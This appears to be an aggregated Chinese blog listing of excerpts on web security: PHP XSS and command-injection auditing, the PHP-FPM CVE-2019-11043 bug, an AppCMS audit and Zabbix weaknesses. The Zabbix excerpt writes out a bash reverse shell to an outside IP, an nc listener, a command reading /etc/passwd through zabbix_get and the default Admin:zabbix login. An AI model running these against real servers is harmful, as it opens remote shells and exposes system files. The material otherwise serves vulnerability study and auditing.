漏洞

PHP代码审计:XSS漏洞

北慕城南 提交于 2019-12-02 06:38:18
当你的才华 还撑不起你的野心时 那你就应该静下心来学习 代码审计学习线上实验,都是CE一边实操,一边整理的笔记,方便以后翻看时,可快速查阅。 目录 XSS代码审计 XSS漏洞介绍 反射型XSS 存储型XSS XXS漏洞防范 反射型xss漏洞防范 php中xss的漏洞防范方法总结 存储型xss漏洞防范 XSS代码审计 XSS漏洞是Web应用程序中最常见的漏洞之一。 网上小公司的站点可能基本大部分没有预防XSS漏洞的固定方法,那么很可能就存在XSS漏洞 XSS漏洞介绍 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是 寻找参数未过滤的输出函数 。 常见的输出函数有: echo printf print print_r sprintf die var_dump var_export . xss 分类: 反射型XSS: <非持久化> 攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。 存储型XSS: <持久化> 代码是存储在服务器中的,如在个人信息或发表文章等地方

PHP代码审计:命令注入漏洞

穿精又带淫゛_ 提交于 2019-12-02 06:37:50
当你的才华 还撑不起你的野心时 那你就应该静下心来学习 代码审计学习线上实验,都是CE一边实操,一边整理的笔记,方便以后翻看时,可快速查阅。 目录 命令注入漏洞产生的原因 简介 相关函数 命令注入漏洞防范 命令注入漏洞产生的原因 命令注入攻击可被攻击者用来导入代码到某特定的计算机程序,以改变程序的运行进程或目的。 PHP命令注入则是由于Web应用程序对用户提交的数据过滤不严格,导致黑客可以通过构造特殊命令字符串的方式,将数据提交至Web应用程序中,并利用该方式执行外部程序或系统命令实施攻击,非法获取数据或者网络资源等 简介 PHP命令注入攻击漏洞是PHP应用程序常见漏洞之一 国内著名的PHP应用程序,如discuz!、dedecms等大型程序在网络中均被公布过存在命令注入攻击漏洞,黑客可以通过命令注入攻击漏洞快速获取网站权限,进而实施挂马、钓鱼等恶意攻击,造成的影响和危害十分巨大。 同时,目前PHP语言应用于Web应用程序开发所占比例较大,Web应用程序员应该了解命令注入攻击漏洞的危害。 需要注意PHP命令注入和Sql注入、PHP代码执行漏洞的区别: Sql注入漏洞是将Sql语句注入到后台数据库中进行解析并执行 PHP代码执行漏洞是将PHP代码注入到Web应用中通过Web容器执行 命令注入漏洞是指注入可以执行的系统命令(如windows中的 CMD 命令、linux中的 Bash

Nginx+PHP-FPM远程命令执行_CVE-2019-11043

余生长醉 提交于 2019-12-02 06:34:05
漏洞描述 此次漏洞主要由于 PHP-FPM 中 sapi/ fpm/ fpm/ fpm_main.c 文件内的 env_path_info 下溢导致,攻击者可以使用换行符 %0a 破坏 Nginx 中 fastcgi_split_path_info 对应的正则表达式,导致传递给 PHP-FPM 的 PATH_INFO 值为空,从而触发该漏洞,通过发送特制的URL请求,在一些特殊的配置情况下会导致任意代码执行。 影响范围 使用 Nginx + PHP-FPM 的服务器,且在 nginx 下进行了如下配置,都可能存在远程代码执行漏洞。 location ~ [^/]\.php(/|$) { fastcgi_split_path_info^(.+?\.php)(/.*)$; fastcgi_param PATH_INFO $fastcgi_path_info; fastcgi_pass php:9000; ... } 漏洞复现 1.正常访问靶机环境 2.执行exp后访问 来源: https://www.cnblogs.com/sstfy/p/11734695.html

PHP-FPM远程代码执行漏洞(CVE-2019-11043)

寵の児 提交于 2019-12-02 05:36:40
0x00 简介 在长亭科技举办的 Real World CTF 中,国外安全研究员 Andrew Danau 在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。 在使用一些有错误的Nginx配置的情况下,通过恶意构造的数据包,即可让PHP-FPM执行任意代码。 但由于是配置文件的开放性。还请使用 nginx+php-fpm 的服务管理员/运维人员及时做好自查自检工作。 0x01 漏洞详情 由于\n(%0a)的传入导致nginx传递给php-fpm的PATH_INFO为空。 进而导致可以通过FCGI_PUTENV与PHP_VALUE相结合,修改当前的php-fpm进程中的php配置。在特殊构造的配置生效的情况下可以触发任意代码执行。 注:完全复制Nginx官方给出的php-fpm示例配置的用户受到此漏洞影响 示例配置如下: location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcgi_param PATH_INFO $fastcgi_path_info; fastcgi_pass php:9000; ... } 0x02 漏洞复现 在vulhub上已经更新了相应的靶场环境: https://github.com/vulhub

[转载] Appcms_2.0.101代码审计

一个人想着一个人 提交于 2019-12-02 05:16:36
最近一直在学习代码审计,对于我这个没有代码审计的菜鸟来说确实是一件无比艰难的事情。下面呢就说一下appcms后台模板Getshell以及读取任意文件,影响的版本是2.0.101版本。其实这个版本已经不用了,也是拿这个来说一下自己的理解。 环境准备 1、win10—>可选; 2、wamp—>可选; 3、burpt—>抓包工具; 4、Sublime text—>文本; 5、appcms-2.0.101安装包; 注明:在安装完毕我们进入后台后会提示将安装目录下admin目录进行重命名,否则会报错的。我将这个目录重命名为cmdback目录。 直捣黄龙 学习代码审计的时候就听说有这款代码审计神器,这款审计看了一下介绍都是匹配的危险函数,然后罗列出来,生成代码审计报告,代码审计人员再根据可能存在的漏洞进行验证。前期主要是先找一下代码审计的感觉,所以就没有用这样自动化的工具。 环境搭建完毕后,通常会以渗透测试的思维去找网站后台的敏感接口,这些接口一般都会与数据库通信,说不定存在SQL注入、文件上传漏洞、任意文件删除漏洞等。比如数据库备份、模板信息、上传文件等。其实今天看的是后台getshell的一个漏洞,这个漏洞是存在于后台的模块管理,对应的php代码是存在于appcms\upload\admin(原始目录,安装后需要重命名)\template.php文件。 下面来通读一下模板修改的代码:

渗透测试服务内容与漏洞检测过程

天涯浪子 提交于 2019-12-02 05:08:32
天气越来越凉爽,在对客户网站代码进行渗透测试,漏洞测试的同时我们SINE安全渗透技术要对客户的网站源代码进行全方位的安全检测与审计,只有真正的了解网站,才能更好的去渗透测试,发现网站存在的漏洞,尽可能的让客户的网站在上线之前,安全防护做到最极致.在后期的网站,平台快速发展过程中,避免重大的漏洞导致的经济损失. 首先分享一下我们SINE安全前段时间对客户的金融平台的渗透测试过程,在审计代码的时候发现了问题,首先看到的是客户网站采用的php语言+mysql数据库,前端还使用了VUE JS框架,在进行渗透测试前,我们要检查客户网站的源代码是否加密以及混淆,再一个查看php文件是否对应的URL地址,是调用的,还是单独的PHP功能页面,还有入口文件和index.php首页访问页面的代码是否一致化.接着要了解的是整个金融平台网站的目录,都包含哪些功能目录,这次我们检查到的,客户网站有会员注册功能,头像上传功能,银行卡添加,充值,提现,投资记录,意见与反馈,个人资料修改等等功能. 我们SINE安全在进行网站代码的安全审计,采用的审计方法是敏感函数以及传输值的追踪与调试的办法去查看代码是否含有恶意代码以及存在的漏洞隐患,是否可导致产生网站漏洞,包括一些逻辑漏洞,垂直,平行越权漏洞的产生. 在大体的代码审计一遍后发现有些PHP文件存在SQL注入漏洞,没有开关闭合引号,导致可以前端传入恶意的参数值

PHP远程代码执行漏洞:CVE-2019-11043

主宰稳场 提交于 2019-12-02 05:04:51
漏洞详情: Nginx上fastcgi_split_path_info在处理带有 %0a 的请求时,会因为遇到换行符 \n 导致PATH_INFO为空。而php-fpm在处理PATH_INFO为空的情况下,存在逻辑缺陷,可以远程代码执行。 影响范围: Nginx+php-fpm的服务器,在使用如下配置的情况下,都可能存在远程代码执行漏洞。 location ~ [^/]\.php(/|$) { fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcgi_param PATH_INFO $fastcgi_path_info; fastcgi_pass php:9000; ... } } php支持php-fpm,在编译php源码的时候会带上 --enable-fpm 复现环境: docker镜像 docker pull php:7.2.3-fpm docker pull nginx 然后启动一个php echo '<?php phpinfo();>' /var/www/html/index.php docker run --name phpfpm -d -v /var/www/html:/app docker.io/php 然后配置然后是Nginx 的配置文件文件放在/root/nginx.conf user root root;

寻找黑客偶像

我是研究僧i 提交于 2019-12-02 04:50:18
1.乔治.霍兹 乔治.霍兹在2007年就破解 iPhone手机,使ios系统可以越狱,在2010年的时候他在自己的博客中正式宣布破解了索尼PS3,而就在2011年的时候被曝出加盟Facebook,更让人惊讶的是还曾在自家的车库里做出了一台无人自驾驶汽车。 2.龚广 , 龚广被称为移动安全领域的“赏金猎人”,善于发现各种漏洞,今年,谷歌官方发文向他致谢,并颁发了总额为112500美金的奖金,这是安卓漏洞奖励计划史上最高金额的奖金,用了2个漏洞就拿了70多万人民币。利用浏览器攻破三星Galaxy S8,仅仅使用一个漏洞就击溃了 Android 系统的防线。一战封神。 学习方面:热爱学习网络知识,洞察力强,动手能力强,利用工具解决问题能力强。 3.工具: 现在我的基础还很薄弱,所以我认为通过阅读python相关书籍和网路链接后在编写一些简单代码,由浅入深的不断学习是现在的任务。而对于SNORT ,Cain and Abel,John the Ripper。这些工具我认为和我们学习的专业有着密切的关联,我也对他们很有兴趣,所以我的目标是在大一结束前熟练掌握这三个工具,希望能够实现。 4.四年学习 我认为四年里我不仅要学习相关计算机的技能,还要提升自己 提高自己的创造力,及时查找到自己欠缺的是什么 具备团队意识 渴望知识对知识保持敬畏之心 遇到问题 独立思考尽最大努力后提问 重视小事

zabbix漏洞

依然范特西╮ 提交于 2019-12-02 03:41:40
1:Zabbix配置不当安全事件 ①案例事件 sohu的zabbix,可导致内网渗透 http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0127627 京东某站shell直入jae内网物理机内核版本过低 http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-086349 2:Zabbix弱口令利用 ①弱口令 运维人员在初次安装zabbix时候,zabbix默认的口令为Admin:zabbix,以及存在guest密码为空,没有进行更改和禁止guest用户,导致zabbix存在致命漏洞,容易遭受攻击。 ②Zabbix server可以远程在agent的机器上执行任意命令 建立监控项 命令调用:bash -i >& /dev/tcp/45.xx.xxx.x1/6666 0>&1 命令调用:nc -lvp 6666 zabbix_get命令调用 system.run[command,<mode>]这个模块是agent自带的,获取服务器shell,获取root权限。 命令调用:zabbix_get -s 172.18.0.4 -k 'system.run[cat /etc/passwd]' 3:Zabbix 注入利用 ① 通过guest用户session的后16位替换连接的sid